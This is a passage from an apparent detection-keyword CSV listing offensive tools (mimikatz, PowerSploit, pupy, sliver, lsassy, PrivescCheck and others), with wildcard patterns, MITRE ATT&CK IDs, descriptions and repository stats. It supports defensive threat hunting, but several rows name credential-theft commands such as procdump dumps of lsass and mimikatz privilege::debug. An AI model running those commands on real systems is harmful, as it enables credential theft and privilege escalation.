OS.,T1548.002 - T1059.003 - T1027.002,TA0005,N/A,N/A,Privilege Escalation,https://github.com/mertdas/PrivKit,1,0,N/A,9,3,265,35,2023-03-23T09:50:09Z,2023-03-20T04:19:40Z -*privcheck32*,offensive_tool_keyword,PrivKit,PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.,T1548.002 - T1059.003 - T1027.002,TA0005,N/A,N/A,Privilege Escalation,https://github.com/mertdas/PrivKit,1,1,N/A,9,3,265,35,2023-03-23T09:50:09Z,2023-03-20T04:19:40Z -*PrivEditor.dll*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,1,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*Privesc.psm1*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Privesc.tests.ps1*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*privesc_checker*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*privesc_checker.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*privesc_juicy_potato.py*,offensive_tool_keyword,SharPyShell,SharPyShell - tiny and obfuscated ASP.NET webshell for C# web,T1100 - T1059 - T1505,TA0002 - TA0003 - TA0004,N/A,N/A,Web Attacks,https://github.com/antonioCoco/SharPyShell,1,1,N/A,N/A,9,809,144,2023-09-27T08:48:31Z,2019-03-10T22:09:40Z -*privesc_powerup.py*,offensive_tool_keyword,SharPyShell,SharPyShell - tiny and obfuscated ASP.NET webshell for C# web,T1100 - T1059 - T1505,TA0002 - TA0003 - TA0004,N/A,N/A,Web Attacks,https://github.com/antonioCoco/SharPyShell,1,1,N/A,N/A,9,809,144,2023-09-27T08:48:31Z,2019-03-10T22:09:40Z -*privesc-check*,offensive_tool_keyword,windows-privesc-check,privesc script checker - Windows-privesc-check is 
standalone executable that runs on Windows systems. It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps (e.g. databases).,T1048 - T1059 - T1088 - T1208,TA0004 - TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/pentestmonkey/windows-privesc-check,1,1,N/A,N/A,10,1394,336,2023-08-01T07:35:20Z,2015-03-22T13:39:38Z -*PrivescCheck.ps1*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*PrivescCheck_*.*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*PrivescCheckAsciiReport*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*PrivEscManager.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*privexchange.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z 
-*privexchange.py*,offensive_tool_keyword,PrivExchange,Exchange your privileges for Domain Admin privs by abusing Exchange,T1091.001 - T1101 - T1201 - T1570,TA0006,N/A,N/A,Exploitation tools,https://github.com/dirkjanm/PrivExchange,1,1,N/A,N/A,10,905,170,2020-01-23T19:48:51Z,2019-01-21T17:39:47Z -*privexchange.py*,offensive_tool_keyword,privexchange,Exchange your privileges for Domain Admin privs by abusing Exchange,T1053.005 - T1078 - T1069.002,TA0002 - TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/dirkjanm/PrivExchange,1,1,N/A,N/A,10,905,170,2020-01-23T19:48:51Z,2019-01-21T17:39:47Z -*PrivExchange-master.zip*,offensive_tool_keyword,privexchange,Exchange your privileges for Domain Admin privs by abusing Exchange,T1053.005 - T1078 - T1069.002,TA0002 - TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/dirkjanm/PrivExchange,1,1,N/A,N/A,10,905,170,2020-01-23T19:48:51Z,2019-01-21T17:39:47Z -*PrivFu-main.zip*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,1,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*PrivFu-master*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,1,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*privilege::backup*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*privilege::debug*,offensive_tool_keyword,mimikatz,mimikatz exploitation command,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*privilege::debug*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*privilege::driver*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*privilege::id*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*privilege::name*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*privilege::restore*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*privilege::security*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*privilege::sysenv*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*privilege::tcb*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*Privileged Accounts - Layers Analysis.txt*,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,AD Enumeration,https://github.com/cyberark/ACLight,1,0,N/A,7,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z -*Privileged Accounts Permissions - Final Report.csv*,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,AD Enumeration,https://github.com/cyberark/ACLight,1,0,N/A,7,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z -*Privileged Accounts Permissions - Irregular Accounts.csv*,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,AD Enumeration,https://github.com/cyberark/ACLight,1,0,N/A,7,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z -*PrivilegeEscalation*,offensive_tool_keyword,PrivilegeEscalation,This program is a very short batch file which allows you to run anything with admin rights without prompting user could be related to other tools using privsec methods,T1548.001 - T1548.003 - T1548.008,TA0004 - TA0002,N/A,N/A,Exploitation tools,https://github.com/LouisVallat/PrivilegeEscalation,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*PrivilegeEscalation_BypassUserAccountControl_Windows.py*,offensive_tool_keyword,viperc2,viperpython backend - 
Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*PrivilegeEscalation_EnumPatchExample_Windows.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*PrivilegeEscalation_ExploitationForPrivilegeEscalation_CVE_2021_40449.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*PrivilegeEscalation_ExploitationForPrivilegeEscalation_EfsPotato.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - 
T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*PrivilegeEscalation_ExploitationForPrivilegeEscalation_SweetPotato.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*PrivilegeEscalation_ExploitationForPrivilegeEscalation_Windows.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*PrivilegeEscalation_ProcessInjection_Getsystem.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - 
TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Privileger.cpp*,offensive_tool_keyword,Privileger,Privileger is a tool to work with Windows Privileges,T1548.002,TA0004 ,N/A,N/A,Privilege Escalation,https://github.com/MzHmO/Privileger,1,1,N/A,8,2,117,25,2023-02-07T07:28:40Z,2023-01-31T11:24:37Z -*Privileger.exe*,offensive_tool_keyword,Privileger,Privileger is a tool to work with Windows Privileges,T1548.002,TA0004 ,N/A,N/A,Privilege Escalation,https://github.com/MzHmO/Privileger,1,1,N/A,8,2,117,25,2023-02-07T07:28:40Z,2023-01-31T11:24:37Z -*Privileger-main.*,offensive_tool_keyword,Privileger,Privileger is a tool to work with Windows Privileges,T1548.002,TA0004 ,N/A,N/A,Privilege Escalation,https://github.com/MzHmO/Privileger,1,1,N/A,8,2,117,25,2023-02-07T07:28:40Z,2023-01-31T11:24:37Z -*Privilegerx64.exe*,offensive_tool_keyword,Privileger,Privileger is a tool to work with Windows Privileges,T1548.002,TA0004 ,N/A,N/A,Privilege Escalation,https://github.com/MzHmO/Privileger,1,1,N/A,8,2,117,25,2023-02-07T07:28:40Z,2023-01-31T11:24:37Z -*Privilegerx86.exe*,offensive_tool_keyword,Privileger,Privileger is a tool to work with Windows Privileges,T1548.002,TA0004 ,N/A,N/A,Privilege Escalation,https://github.com/MzHmO/Privileger,1,1,N/A,8,2,117,25,2023-02-07T07:28:40Z,2023-01-31T11:24:37Z -*PrivKit32*,offensive_tool_keyword,PrivKit,PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.,T1548.002 - T1059.003 - T1027.002,TA0005,N/A,N/A,Privilege Escalation,https://github.com/mertdas/PrivKit,1,1,N/A,9,3,265,35,2023-03-23T09:50:09Z,2023-03-20T04:19:40Z -*PrivKit-main*,offensive_tool_keyword,PrivKit,PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.,T1548.002 - T1059.003 - T1027.002,TA0005,N/A,N/A,Privilege 
Escalation,https://github.com/mertdas/PrivKit,1,1,N/A,9,3,265,35,2023-03-23T09:50:09Z,2023-03-20T04:19:40Z -*Probable-Wordlists*,offensive_tool_keyword,Probable-Wordlists,Password wordlists,T1110 - T1114,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/berzerk0/Probable-Wordlists,1,1,N/A,N/A,10,8139,1614,2021-12-21T18:14:59Z,2017-04-16T17:08:27Z -*Probable-Wordlists*,offensive_tool_keyword,Probable-Wordlists,real password lists,T1110 - T1114,TA0006 - TA0007,N/A,N/A,Exploitation tools,https://github.com/berzerk0/Probable-Wordlists,1,1,N/A,N/A,10,8139,1614,2021-12-21T18:14:59Z,2017-04-16T17:08:27Z -*procdump* lsass.exe *.dmp*,offensive_tool_keyword,onex,C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps,T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/cube0x0/MiniDump,1,0,N/A,N/A,3,263,48,2021-10-13T18:00:46Z,2021-08-14T12:26:16Z -*procdump*lsass*,greyware_tool_keyword,Procdump,dump lsass process with procdump,T1003.001,TA0006,N/A,N/A,Credential Access,https://learn.microsoft.com/en-us/sysinternals/downloads/procdump,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*procdump.exe*lsass*,offensive_tool_keyword,AD exploitation cheat sheet,Dump LSASS memory through a process snapshot (-r) avoiding interacting with it directly,T1003.001,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*procdump/dump_windows.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z 
-*procdump_dump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*procdump_embedded*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*procdump_path=*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,0,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*process::exports*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*process::imports*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*process::list*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*process::resume*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 